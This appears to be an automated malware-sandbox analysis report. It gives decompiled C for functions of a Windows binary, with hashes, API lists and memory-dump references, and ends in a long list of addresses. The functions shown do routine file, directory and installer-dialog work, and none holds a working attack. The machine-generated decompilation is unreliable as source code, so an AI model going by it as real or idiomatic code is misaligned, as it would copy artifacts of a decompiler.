                                                  • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                  • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                  • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                  • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040587F(CHAR* _a4) {
                                                  				signed char _t3;
                                                  
                                                  				_t3 = GetFileAttributesA(_a4); // executed
                                                  				if(_t3 != 0xffffffff) {
                                                  					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                  				}
                                                  				return _t3;
                                                  			}





                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405895
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                  • Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
                                                  • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                  • Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004053F2(CHAR* _a4) {
                                                  				int _t2;
                                                  
                                                  				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                  				if(_t2 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				return 0;
                                                  			}





                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                                                  • GetLastError.KERNEL32 ref: 00405406
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                  • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
                                                  • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                  • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004030B0(void* _a4, long _a8) {
                                                  				int _t6;
                                                  				long _t10;
                                                  
                                                  				_t10 = _a8;
                                                  				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
                                                  				if(_t6 == 0 || _a8 != _t10) {
                                                  					return 0;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}






                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                  • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
                                                  • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                  • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 25%
                                                  			E10004E8A() {
                                                  				void* _t1;
                                                  				void* _t2;
                                                  				void* _t3;
                                                  				void* _t4;
                                                  				void* _t7;
                                                  
                                                  				_push(1);
                                                  				_push(0);
                                                  				_push(0); // executed
                                                  				_t1 = E10004EF1(_t2, _t3, _t4, _t7); // executed
                                                  				return _t1;
                                                  			}









                                                  APIs
                                                  • _doexit.LIBCMT ref: 10004E90
                                                    • Part of subcall function 10004EF1: __lock.LIBCMT ref: 10004EFF
                                                    • Part of subcall function 10004EF1: RtlDecodePointer.NTDLL(10014600,0000001C,10004E85,?,00000001,00000000,?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D), ref: 10004F3E
                                                    • Part of subcall function 10004EF1: DecodePointer.KERNEL32(?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F4F
                                                    • Part of subcall function 10004EF1: EncodePointer.KERNEL32(00000000,?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F68
                                                    • Part of subcall function 10004EF1: DecodePointer.KERNEL32(-00000004,?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F78
                                                    • Part of subcall function 10004EF1: EncodePointer.KERNEL32(00000000,?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F7E
                                                    • Part of subcall function 10004EF1: DecodePointer.KERNEL32(?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F94
                                                    • Part of subcall function 10004EF1: DecodePointer.KERNEL32(?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F9F
                                                    • Part of subcall function 10004EF1: __initterm.LIBCMT ref: 10004FC7
                                                    • Part of subcall function 10004EF1: __initterm.LIBCMT ref: 10004FD8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                  • String ID:
                                                  • API String ID: 3712619029-0
                                                  • Opcode ID: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                                  • Instruction ID: df00a98e940c2f5b518221b3c0e3c8087063226d44fc96380071309cb11cc2a3
                                                  • Opcode Fuzzy Hash: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                                  • Instruction Fuzzy Hash: B7A002A9BD434461FC6091506C43F5461016750F41FD50060BB082C9C5B8C6265C445B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004030E2(long _a4) {
                                                  				long _t2;
                                                  
                                                  				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
                                                  				return _t2;
                                                  			}





                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,00027BE4), ref: 004030F0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                  • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                  • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                  • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 98%
                                                  			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                  				struct HWND__* _v8;
                                                  				struct HWND__* _v12;
                                                  				signed int _v16;
                                                  				intOrPtr _v20;
                                                  				void* _v24;
                                                  				long _v28;
                                                  				int _v32;
                                                  				signed int _v40;
                                                  				int _v44;
                                                  				signed int* _v56;
                                                  				intOrPtr _v60;
                                                  				signed int _v64;
                                                  				long _v68;
                                                  				void* _v72;
                                                  				intOrPtr _v76;
                                                  				intOrPtr _v80;
                                                  				void* _v84;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				struct HWND__* _t182;
                                                  				intOrPtr _t183;
                                                  				int _t189;
                                                  				int _t196;
                                                  				intOrPtr _t198;
                                                  				long _t202;
                                                  				signed int _t206;
                                                  				signed int _t217;
                                                  				void* _t220;
                                                  				void* _t221;
                                                  				int _t227;
                                                  				intOrPtr _t231;
                                                  				signed int _t232;
                                                  				signed int _t233;
                                                  				signed int _t240;
                                                  				signed int _t242;
                                                  				signed int _t245;
                                                  				signed int _t247;
                                                  				struct HBITMAP__* _t250;
                                                  				void* _t252;
                                                  				char* _t268;
                                                  				signed char _t269;
                                                  				long _t274;
                                                  				int _t280;
                                                  				signed int* _t281;
                                                  				int _t282;
                                                  				long _t283;
                                                  				signed int* _t284;
                                                  				int _t285;
                                                  				long _t286;
                                                  				signed int _t287;
                                                  				long _t288;
                                                  				signed int _t291;
                                                  				int _t294;
                                                  				signed int _t298;
                                                  				signed int _t300;
                                                  				signed int _t302;
                                                  				intOrPtr _t309;
                                                  				int* _t310;
                                                  				void* _t311;
                                                  				int _t315;
                                                  				int _t316;
                                                  				int _t317;
                                                  				signed int _t318;
                                                  				void* _t320;
                                                  				void* _t328;
                                                  				void* _t331;
                                                  
                                                  				_v12 = GetDlgItem(_a4, 0x3f9);
                                                  				_t182 = GetDlgItem(_a4, 0x408);
                                                  				_t280 =  *0x42ec48; // 0x79f004
                                                  				_t320 = SendMessageA;
                                                  				_v8 = _t182;
                                                  				_t183 =  *0x42ec30; // 0x79ee58
                                                  				_t315 = 0;
                                                  				_v32 = _t280;
                                                  				_v20 = _t183 + 0x94;
                                                  				if(_a8 != 0x110) {
                                                  					L23:
                                                  					__eflags = _a8 - 0x405;
                                                  					if(_a8 != 0x405) {
                                                  						_t289 = _a16;
                                                  					} else {
                                                  						_a12 = _t315;
                                                  						_t289 = 1;
                                                  						_a8 = 0x40f;
                                                  						_a16 = 1;
                                                  					}
                                                  					__eflags = _a8 - 0x4e;
                                                  					if(_a8 == 0x4e) {
                                                  						L28:
                                                  						__eflags = _a8 - 0x413;
                                                  						_v16 = _t289;
                                                  						if(_a8 == 0x413) {
                                                  							L30:
                                                  							__eflags =  *0x42ec39 & 0x00000002;
                                                  							if(( *0x42ec39 & 0x00000002) != 0) {
                                                  								L41:
                                                  								__eflags = _v16 - _t315;
                                                  								if(_v16 != _t315) {
                                                  									_t232 = _v16;
                                                  									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                                                  									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                  										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                  									}
                                                  									_t233 = _v16;
                                                  									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                                                  									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                  										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                                                  										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                  											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                                                  											 *_t284 =  *_t284 & 0xffffffdf;
                                                  											__eflags =  *_t284;
                                                  										} else {
                                                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L48;
                                                  							}
                                                  							__eflags = _a8 - 0x413;
                                                  							if(_a8 == 0x413) {
                                                  								L33:
                                                  								__eflags = _a8 - 0x413;
                                                  								_t289 = 0 | _a8 != 0x00000413;
                                                  								_t240 = E00404782(_v8, _a8 != 0x413);
                                                  								__eflags = _t240 - _t315;
                                                  								if(_t240 >= _t315) {
                                                  									_t93 = _t280 + 8; // 0x8
                                                  									_t310 = _t240 * 0x418 + _t93;
                                                  									_t289 =  *_t310;
                                                  									__eflags = _t289 & 0x00000010;
                                                  									if((_t289 & 0x00000010) == 0) {
                                                  										__eflags = _t289 & 0x00000040;
                                                  										if((_t289 & 0x00000040) == 0) {
                                                  											_t298 = _t289 ^ 0x00000001;
                                                  											__eflags = _t298;
                                                  										} else {
                                                  											_t300 = _t289 ^ 0x00000080;
                                                  											__eflags = _t300;
                                                  											if(_t300 >= 0) {
                                                  												_t298 = _t300 & 0xfffffffe;
                                                  											} else {
                                                  												_t298 = _t300 | 0x00000001;
                                                  											}
                                                  										}
                                                  										 *_t310 = _t298;
                                                  										E0040117D(_t240);
                                                  										_t242 =  *0x42ec38; // 0x80
                                                  										_t289 = 1;
                                                  										_a8 = 0x40f;
                                                  										_t245 =  !_t242 >> 0x00000008 & 1;
                                                  										__eflags = _t245;
                                                  										_a12 = 1;
                                                  										_a16 = _t245;
                                                  									}
                                                  								}
                                                  								goto L41;
                                                  							}
                                                  							_t289 = _a16;
                                                  							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                                                  							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                                                  								goto L41;
                                                  							}
                                                  							goto L33;
                                                  						}
                                                  						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                                                  						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                                                  							goto L48;
                                                  						}
                                                  						goto L30;
                                                  					} else {
                                                  						__eflags = _a8 - 0x413;
                                                  						if(_a8 != 0x413) {
                                                  							L48:
                                                  							__eflags = _a8 - 0x111;
                                                  							if(_a8 != 0x111) {
                                                  								L56:
                                                  								__eflags = _a8 - 0x200;
                                                  								if(_a8 == 0x200) {
                                                  									SendMessageA(_v8, 0x200, _t315, _t315);
                                                  								}
                                                  								__eflags = _a8 - 0x40b;
                                                  								if(_a8 == 0x40b) {
                                                  									_t220 =  *0x42a07c;
                                                  									__eflags = _t220 - _t315;
                                                  									if(_t220 != _t315) {
                                                  										ImageList_Destroy(_t220);
                                                  									}
                                                  									_t221 =  *0x42a094;
                                                  									__eflags = _t221 - _t315;
                                                  									if(_t221 != _t315) {
                                                  										GlobalFree(_t221);
                                                  									}
                                                  									 *0x42a07c = _t315;
                                                  									 *0x42a094 = _t315;
                                                  									 *0x42ec80 = _t315;
                                                  								}
                                                  								__eflags = _a8 - 0x40f;
                                                  								if(_a8 != 0x40f) {
                                                  									L86:
                                                  									__eflags = _a8 - 0x420;
                                                  									if(_a8 == 0x420) {
                                                  										__eflags =  *0x42ec39 & 0x00000001;
                                                  										if(( *0x42ec39 & 0x00000001) != 0) {
                                                  											__eflags = _a16 - 0x20;
                                                  											_t189 = (0 | _a16 == 0x00000020) << 3;
                                                  											__eflags = _t189;
                                                  											_t316 = _t189;
                                                  											ShowWindow(_v8, _t316);
                                                  											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                  										}
                                                  									}
                                                  									goto L89;
                                                  								} else {
                                                  									E004011EF(_t289, _t315, _t315);
                                                  									__eflags = _a12 - _t315;
                                                  									if(_a12 != _t315) {
                                                  										E0040140B(8);
                                                  									}
                                                  									__eflags = _a16 - _t315;
                                                  									if(_a16 == _t315) {
                                                  										L73:
                                                  										E004011EF(_t289, _t315, _t315);
                                                  										__eflags =  *0x42ec4c - _t315; // 0x1
                                                  										_v32 =  *0x42a094;
                                                  										_t196 =  *0x42ec48; // 0x79f004
                                                  										_v60 = 0xf030;
                                                  										_v16 = _t315;
                                                  										if(__eflags <= 0) {
                                                  											L84:
                                                  											InvalidateRect(_v8, _t315, 1);
                                                  											_t198 =  *0x42e3fc; // 0x7a3d7a
                                                  											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                                                  											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                                  												E0040473D(0x3ff, 0xfffffffb, E00404755(5));
                                                  											}
                                                  											goto L86;
                                                  										} else {
                                                  											_t142 = _t196 + 8; // 0x79f00c
                                                  											_t281 = _t142;
                                                  											do {
                                                  												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                  												__eflags = _t202 - _t315;
                                                  												if(_t202 != _t315) {
                                                  													_t291 =  *_t281;
                                                  													_v68 = _t202;
                                                  													__eflags = _t291 & 0x00000001;
                                                  													_v72 = 8;
                                                  													if((_t291 & 0x00000001) != 0) {
                                                  														_t151 =  &(_t281[4]); // 0x79f01c
                                                  														_v72 = 9;
                                                  														_v56 = _t151;
                                                  														_t154 =  &(_t281[0]);
                                                  														 *_t154 = _t281[0] & 0x000000fe;
                                                  														__eflags =  *_t154;
                                                  													}
                                                  													__eflags = _t291 & 0x00000040;
                                                  													if((_t291 & 0x00000040) == 0) {
                                                  														_t206 = (_t291 & 0x00000001) + 1;
                                                  														__eflags = _t291 & 0x00000010;
                                                  														if((_t291 & 0x00000010) != 0) {
                                                  															_t206 = _t206 + 3;
                                                  															__eflags = _t206;
                                                  														}
                                                  													} else {
                                                  														_t206 = 3;
                                                  													}
                                                  													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                                                  													__eflags = _t294;
                                                  													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                  													SendMessageA(_v8, 0x1102, _t294, _v68);
                                                  													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                  												}
                                                  												_v16 = _v16 + 1;
                                                  												_t281 =  &(_t281[0x106]);
                                                  												__eflags = _v16 -  *0x42ec4c; // 0x1
                                                  											} while (__eflags < 0);
                                                  											goto L84;
                                                  										}
                                                  									} else {
                                                  										_t282 = E004012E2( *0x42a094);
                                                  										E00401299(_t282);
                                                  										_t217 = 0;
                                                  										_t289 = 0;
                                                  										__eflags = _t282 - _t315;
                                                  										if(_t282 <= _t315) {
                                                  											L72:
                                                  											SendMessageA(_v12, 0x14e, _t289, _t315);
                                                  											_a16 = _t282;
                                                  											_a8 = 0x420;
                                                  											goto L73;
                                                  										} else {
                                                  											goto L69;
                                                  										}
                                                  										do {
                                                  											L69:
                                                  											_t309 = _v20;
                                                  											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                                                  											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                                                  												_t289 = _t289 + 1;
                                                  												__eflags = _t289;
                                                  											}
                                                  											_t217 = _t217 + 1;
                                                  											__eflags = _t217 - _t282;
                                                  										} while (_t217 < _t282);
                                                  										goto L72;
                                                  									}
                                                  								}
                                                  							}
                                                  							__eflags = _a12 - 0x3f9;
                                                  							if(_a12 != 0x3f9) {
                                                  								goto L89;
                                                  							}
                                                  							__eflags = _a12 >> 0x10 - 1;
                                                  							if(_a12 >> 0x10 != 1) {
                                                  								goto L89;
                                                  							}
                                                  							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                  							__eflags = _t227 - 0xffffffff;
                                                  							if(_t227 == 0xffffffff) {
                                                  								goto L89;
                                                  							}
                                                  							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                  							__eflags = _t283 - 0xffffffff;
                                                  							if(_t283 == 0xffffffff) {
                                                  								L54:
                                                  								_t283 = 0x20;
                                                  								L55:
                                                  								E00401299(_t283);
                                                  								SendMessageA(_a4, 0x420, _t315, _t283);
                                                  								_a12 = 1;
                                                  								_a16 = _t315;
                                                  								_a8 = 0x40f;
                                                  								goto L56;
                                                  							}
                                                  							_t231 = _v20;
                                                  							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                                                  							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                                                  								goto L55;
                                                  							}
                                                  							goto L54;
                                                  						}
                                                  						goto L28;
                                                  					}
                                                  				} else {
                                                  					 *0x42ec80 = _a4;
                                                  					_t247 =  *0x42ec4c; // 0x1
                                                  					_t285 = 2;
                                                  					_v28 = 0;
                                                  					_v16 = _t285;
                                                  					 *0x42a094 = GlobalAlloc(0x40, _t247 << 2);
                                                  					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
                                                  					 *0x42a088 =  *0x42a088 | 0xffffffff;
                                                  					_v24 = _t250;
                                                  					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
                                                  					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                  					 *0x42a07c = _t252;
                                                  					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                  					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
                                                  					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                  						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                  					}
                                                  					DeleteObject(_v24);
                                                  					_t286 = 0;
                                                  					do {
                                                  						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                  						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                  							if(_t286 != 0x20) {
                                                  								_v16 = _t315;
                                                  							}
                                                  							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                  						}
                                                  						_t286 = _t286 + 1;
                                                  					} while (_t286 < 0x21);
                                                  					_t317 = _a16;
                                                  					_t287 = _v16;
                                                  					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                  					_push(0x15);
                                                  					E00403E83(_a4);
                                                  					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                  					_push(0x16);
                                                  					E00403E83(_a4);
                                                  					_t318 = 0;
                                                  					_t288 = 0;
                                                  					_t328 =  *0x42ec4c - _t318; // 0x1
                                                  					if(_t328 <= 0) {
                                                  						L19:
                                                  						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                  						goto L20;
                                                  					} else {
                                                  						_t311 = _v32 + 8;
                                                  						_v24 = _t311;
                                                  						do {
                                                  							_t268 = _t311 + 0x10;
                                                  							if( *_t268 != 0) {
                                                  								_v60 = _t268;
                                                  								_t269 =  *_t311;
                                                  								_t302 = 0x20;
                                                  								_v84 = _t288;
                                                  								_v80 = 0xffff0002;
                                                  								_v76 = 0xd;
                                                  								_v64 = _t302;
                                                  								_v40 = _t318;
                                                  								_v68 = _t269 & _t302;
                                                  								if((_t269 & 0x00000002) == 0) {
                                                  									__eflags = _t269 & 0x00000004;
                                                  									if((_t269 & 0x00000004) == 0) {
                                                  										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                  									} else {
                                                  										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                  									}
                                                  								} else {
                                                  									_v76 = 0x4d;
                                                  									_v44 = 1;
                                                  									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                  									_v28 = 1;
                                                  									 *( *0x42a094 + _t318 * 4) = _t274;
                                                  									_t288 =  *( *0x42a094 + _t318 * 4);
                                                  								}
                                                  							}
                                                  							_t318 = _t318 + 1;
                                                  							_t311 = _v24 + 0x418;
                                                  							_t331 = _t318 -  *0x42ec4c; // 0x1
                                                  							_v24 = _t311;
                                                  						} while (_t331 < 0);
                                                  						if(_v28 != 0) {
                                                  							L20:
                                                  							if(_v16 != 0) {
                                                  								E00403EB8(_v8);
                                                  								_t280 = _v32;
                                                  								_t315 = 0;
                                                  								__eflags = 0;
                                                  								goto L23;
                                                  							} else {
                                                  								ShowWindow(_v12, 5);
                                                  								E00403EB8(_v12);
                                                  								L89:
                                                  								return E00403EEA(_a8, _a12, _a16);
                                                  							}
                                                  						}
                                                  						goto L19;
                                                  					}
                                                  				}
                                                  			}






































































                                                  0x00404d6c
                                                  0x00404d6e
                                                  0x00404d71
                                                  0x00404d7a
                                                  0x00404d7a
                                                  0x00000000
                                                  0x00404ced
                                                  0x00404c81
                                                  0x00404c8c
                                                  0x00404c8f
                                                  0x00404c94
                                                  0x00404c96
                                                  0x00404c98
                                                  0x00404c9a
                                                  0x00404caa
                                                  0x00404cb4
                                                  0x00404cb6
                                                  0x00404cb9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404c9c
                                                  0x00404c9c
                                                  0x00404c9c
                                                  0x00404c9f
                                                  0x00404ca2
                                                  0x00404ca4
                                                  0x00404ca4
                                                  0x00404ca4
                                                  0x00404ca5
                                                  0x00404ca6
                                                  0x00404ca6
                                                  0x00000000
                                                  0x00404c9c
                                                  0x00404c7f
                                                  0x00404c63
                                                  0x00404b9a
                                                  0x00404ba0
                                                  0x00000000
                                                  0x00000000
                                                  0x00404bac
                                                  0x00404bb0
                                                  0x00000000
                                                  0x00000000
                                                  0x00404bc0
                                                  0x00404bc2
                                                  0x00404bc5
                                                  0x00000000
                                                  0x00000000
                                                  0x00404bd7
                                                  0x00404bd9
                                                  0x00404bdc
                                                  0x00404be6
                                                  0x00404be8
                                                  0x00404be9
                                                  0x00404bea
                                                  0x00404bf9
                                                  0x00404bfb
                                                  0x00404c02
                                                  0x00404c05
                                                  0x00000000
                                                  0x00404c05
                                                  0x00404bde
                                                  0x00404be1
                                                  0x00404be4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404be4
                                                  0x00000000
                                                  0x00404aa4
                                                  0x00404856
                                                  0x0040485b
                                                  0x00404860
                                                  0x00404865
                                                  0x00404866
                                                  0x0040486f
                                                  0x0040487a
                                                  0x00404885
                                                  0x0040488b
                                                  0x00404899
                                                  0x004048ae
                                                  0x004048b3
                                                  0x004048be
                                                  0x004048c7
                                                  0x004048dc
                                                  0x004048ed
                                                  0x004048fa
                                                  0x004048fa
                                                  0x004048ff
                                                  0x00404905
                                                  0x00404907
                                                  0x0040490a
                                                  0x0040490f
                                                  0x00404914
                                                  0x00404916
                                                  0x00404916
                                                  0x00404936
                                                  0x00404936
                                                  0x00404938
                                                  0x00404939
                                                  0x0040493e
                                                  0x00404941
                                                  0x00404944
                                                  0x00404948
                                                  0x0040494d
                                                  0x00404952
                                                  0x00404956
                                                  0x0040495b
                                                  0x00404960
                                                  0x00404962
                                                  0x00404964
                                                  0x0040496a
                                                  0x00404a34
                                                  0x00404a47
                                                  0x00000000
                                                  0x00404970
                                                  0x00404973
                                                  0x00404976
